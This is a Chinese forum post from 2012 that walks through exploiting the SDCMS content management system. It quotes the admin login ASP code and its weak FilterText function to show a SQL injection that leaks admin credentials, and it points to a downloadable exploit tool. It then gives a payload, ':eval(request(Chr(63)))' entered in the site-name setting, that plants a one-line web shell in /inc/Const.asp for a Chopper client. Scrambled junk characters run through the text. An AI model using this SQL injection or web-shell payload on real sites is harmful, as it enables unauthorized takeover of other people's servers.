作者:T00LS 鬼哥: k8 N- e/ r* t/ X2 {
漏洞文件:后台目录/index.asp$ l/ S7 o1 D# @+ M2 O% }% A
- W" a1 k- [! l" p! {; F7 k
Sub Check. }1 R/ ]1 i( J) f; N$ ^
Dim username,password,code,getcode,Rs: N: F% i. I; _3 X8 F
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub, [ P- f3 `4 e+ [) G
username=FilterText(Trim(Request.Form("username")),1)5 h* k. c; m' p4 }# e
password=FilterText(Trim(Request.Form("password")),1)' V0 |1 c. `6 x6 [9 Q
code=Trim(Request.Form("yzm"))
0 @/ @- l- Y" j% X* S5 D getcode=Session("SDCMSCode")
$ I+ `8 h# G6 ~- |& `- S IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died8 n3 `5 J L$ {+ L q
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
. f4 q! l0 `" ~2 a IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied$ a/ J% g9 }* U0 I# D
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied O8 ?2 R) e: E; V2 D
IF username="" or password="" Then$ t M% M+ P- s
Echo "用户名或密码不能为空"ied
3 d3 U" C& ?& w: |9 z Else% h! \9 G7 m8 G5 \* r. b
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")
9 K, ~, B( X1 d- q IF Rs.Eof Then
) s; _) n* d4 L9 ]9 n4 ~/ d7 x AddLog username,GetIp,"登录失败",15 B4 P1 U4 w+ [8 f
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"( i8 X% j; D2 |1 G" F5 y
Else
9 o, e. Q7 ^7 |8 h Add_Cookies "sdcms_id",Rs(0)4 Y4 [& s& f9 i1 l! W; o& v0 V, \
Add_Cookies "sdcms_name",username
/ m- Z8 W" ?# C( L( ~$ Y Add_Cookies "sdcms_pwd",Rs(2)
5 @1 v- G0 r# R6 Y# } Add_Cookies "sdcms_admin",Rs(3)+ }% a! g. G- O8 L! j" U0 N
Add_Cookies "sdcms_alllever",Rs(4)
; Q7 J' W8 [- [7 Q: F i& r Add_Cookies "sdcms_infolever",Rs(5)
( Z$ L- `7 m6 N. b2 T Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
: f3 m0 Y, R9 \/ o+ Q: O# H- R AddLog username,GetIp,"登录成功",1# ^" A$ B- d0 A& g, K
'自动删除30天前的Log记录
: N3 X5 h% g& u: B IF Sdcms_DataType Then
1 s/ _4 b# g+ g Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
; [1 i9 F: \7 ?( O Else
7 m0 b1 v! Q I4 a: N% [ Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
3 [- ^. _5 k6 n3 }& T& t End IF
! l: P2 [# X) V8 w: j) f$ B- x Go("sdcms_index.asp")
# ^" w+ V. F1 v End IF: d" C! O% h% D1 O& O0 u
Rs.Close$ E; ~1 Z+ ~# E2 T; j B/ B
Set Rs=Nothing" E& O9 j* L9 T" Q+ p
End IF4 _' U3 ^! m9 @- l
End Sub; B- a( L" H) Y" W3 [) F+ |
; q1 \( l& S; ?. k) z/ { d’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
8 `/ h* q9 ]. H: [9 E! N! c, X; {! N% T4 \5 x$ L, g) M6 M* n- y2 J
Function FilterText(ByVal t0,ByVal t1)
|6 I: ^. ^ M4 w IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function! o# |8 d1 m: H* P! J2 r% f
t0=Trim(t0)$ e) V$ j$ U( |; C
Select Case t1
1 D8 P, \7 k0 S9 @0 e( L, } Case "1"3 v4 g2 X; R9 I* n" `. {; f
t0=Replace(t0,Chr(32),"")
4 Q( }5 @3 {4 f+ k t0=Replace(t0,Chr(13),"")
+ |! k5 k% F7 u t0=Replace(t0,Chr(10)&Chr(10),"")/ r% y" c- b( l2 [# K8 O5 t
t0=Replace(t0,Chr(10),"")# v: z" G. t! U% G
Case "2"
" x9 d& D6 h; N( v x" Q6 H t0=Replace(t0,Chr(8),"")'回格
2 S- q, j" K: | t0=Replace(t0,Chr(9),"")'tab(水平制表符)
: M5 z4 f' J' f/ `/ X. ^0 h t0=Replace(t0,Chr(10),"")'换行
7 s3 T; _+ Y. C6 {0 j t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
: ?5 M* T: Z. L t0=Replace(t0,Chr(12),"")'换页2 w( O2 |8 b- _& G
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
9 B& e' n7 z( c/ A; Z t0=Replace(t0,Chr(22),"")# {9 A; V& {4 x
t0=Replace(t0,Chr(32),"")'空格 SPACE) E! E$ R- e8 {" ~& V
t0=Replace(t0,Chr(33),"")'!/ J# h* q- l: s4 Z& u! u
t0=Replace(t0,Chr(34),"")'"+ Q' L3 B# E1 t W* m
t0=Replace(t0,Chr(35),"")'#
& {: X3 l- n. I+ [2 T! o t0=Replace(t0,Chr(36),"")'$4 ~# ~- G8 ~8 j; R
t0=Replace(t0,Chr(37),"")'%
9 Z1 k6 T% A# G0 R" J6 w) L4 K t0=Replace(t0,Chr(38),"")'&6 z9 L0 H- S0 q5 h1 a
t0=Replace(t0,Chr(39),"")''% _; g; f8 I0 O% ~6 H
t0=Replace(t0,Chr(40),"")'(
! ^! H# \1 n" n3 t2 d( g% Y5 u t0=Replace(t0,Chr(41),"")')
0 j, ]8 ~4 P- p t0=Replace(t0,Chr(42),"")'** j7 W- f/ {3 i! L
t0=Replace(t0,Chr(43),"")'+
- Z( y& C7 S4 N! s t0=Replace(t0,Chr(44),"")',
; ?7 M. u* A( J/ I2 H" _: p ~ t0=Replace(t0,Chr(45),"")'-
4 C* n+ a; H, b t0=Replace(t0,Chr(46),"")'.
4 U# O4 ~2 P& I j+ L# m t0=Replace(t0,Chr(47),"")'/9 A* I0 P: E5 |$ l" H
t0=Replace(t0,Chr(58),"")':
8 s. Q p* o/ m { y" \! l! k t0=Replace(t0,Chr(59),"")';
8 y6 z" ^% p% W y; X: z8 x t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
6 j1 q% U( w0 G8 f/ ~ t0=Replace(t0,Chr(63),"")'?
8 A) x8 w( P/ d+ L' [2 f t0=Replace(t0,Chr(64),"")'@/ @4 k. u( i2 O: ?
t0=Replace(t0,Chr(91),"")'\3 n4 F+ U1 l, W; e
t0=Replace(t0,Chr(92),"")'\
8 Z9 n" P1 n5 m! V. G, b0 r t0=Replace(t0,Chr(93),"")']% W7 u/ q/ m9 `/ O2 K3 h6 A8 H
t0=Replace(t0,Chr(94),"")'^. p' A. k$ o' \. I8 L5 S1 Y$ s% }0 J# v
t0=Replace(t0,Chr(95),"")'_. p! k+ X) E' C/ Y+ g. N: P
t0=Replace(t0,Chr(96),"")'`3 q* }+ I8 s7 a8 T/ ^
t0=Replace(t0,Chr(123),"")'{
% @1 O! l) L ` t0=Replace(t0,Chr(124),"")'|2 Y7 k* [% y2 M: X% x5 V2 \
t0=Replace(t0,Chr(125),"")'}
2 i7 G7 P2 p) B( M t0=Replace(t0,Chr(126),"")'~' ?2 P+ p4 \* }: ?! b
Case Else1 t+ {2 e# m# }5 q
t0=Replace(t0, "&", "&")
, {( L9 g ]8 Y. S- S7 s t0=Replace(t0, "'", "'")
, F% L3 Y% I$ I. { t0=Replace(t0, """", """)9 w' X% n. } H+ ~$ q7 Q
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
8 V1 x; ~/ k- O ^5 G) m% H End Select6 i. X6 \9 j; L" W
IF Instr(Lcase(t0),"expression")>0 Then
! S: i" }& }% V' w t0=Replace(t0,"expression","e­xpression", 1, -1, 0)0 V! p# o+ R0 X( s5 B- N
End If/ h) ]3 L4 E: `
FilterText=t0
, h' }- j7 y: c6 K. UEnd Function
( G. R( P7 b/ i9 l8 q5 ^
/ G! w( \, ]2 L$ g! A看到没。直接参数是1 只过滤, Z$ [+ h: ?9 s7 p
t0=Replace(t0,Chr(32)," ")7 M [) n/ W. |& x, x; v: P! g
t0=Replace(t0,Chr(13),"")
% k9 A& N# c3 r; M& o. d, }3 f t0=Replace(t0,Chr(10)&Chr(10),"; Z5 K9 f/ o/ ?3 \% _
")$ v! b3 ]9 y6 l$ b; V
t0=Replace(t0,Chr(10),"$ Z6 y- f% D* g2 @. H
")
7 u7 H+ G3 `- g- y8 ?( R( Z9 w漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!. {- `4 D- `. V. ]; M
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
9 ]/ G' Y2 c4 ^" K1 H" J
j5 ]( A. m, @* H测试:
/ @6 ]+ i4 ?" E. j6 J( M! W1 ]! T4 ?! x/ d3 G
4 M% a: Q W, a6 _1 u2 v现在输入工具上验证码,然后点OK
& P a) `; c* R% l* s% j+ _; A, ~0 f: u4 g/ D/ X5 m/ r
2 e. t) v, X& o6 w
看到我们直接进入后台管理界面了,呵呵!
1 U& ?0 G+ o. v/ p
% C& O( X9 ] y8 j+ c7 R. H3 J: F
* ? o1 F. u4 r' O( d( m. V3 n$ J f# z) s& K* [
这样直接进入后台了。。。。
. v; A. ?5 U6 K" v& B8 Y+ i: k3 K. E& ]* d3 R
Y5 y/ A% U0 t2 C6 e' q" ^5 v3 Z: M
SDCMS提权:- }: p% Z, N1 f$ t5 Y! I v9 C: @
! t: L+ }/ P* G0 a方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
( D' e/ C7 Z9 h9 F, d5 d
- a# {7 h0 ]6 O3 }) I# q0 J9 A5 |: `: X" ~7 b) j
( L7 R' _: q- i8 L7 j4 X# h. e
OK,现在用菜刀连接下!
' o# c* u) B6 {. C, ~7 S
$ Q3 L8 M+ l% C/ [3 `3 n7 u$ D+ s! @. Y& |4 F5 K0 ~8 F
( o, }% T8 N# ]1 Z4 y K 5 n- Y. p& j) S+ h
; B! a# g4 M! s- ]
|
发表于 2012-11-9 20:57:02
收藏
支持
反对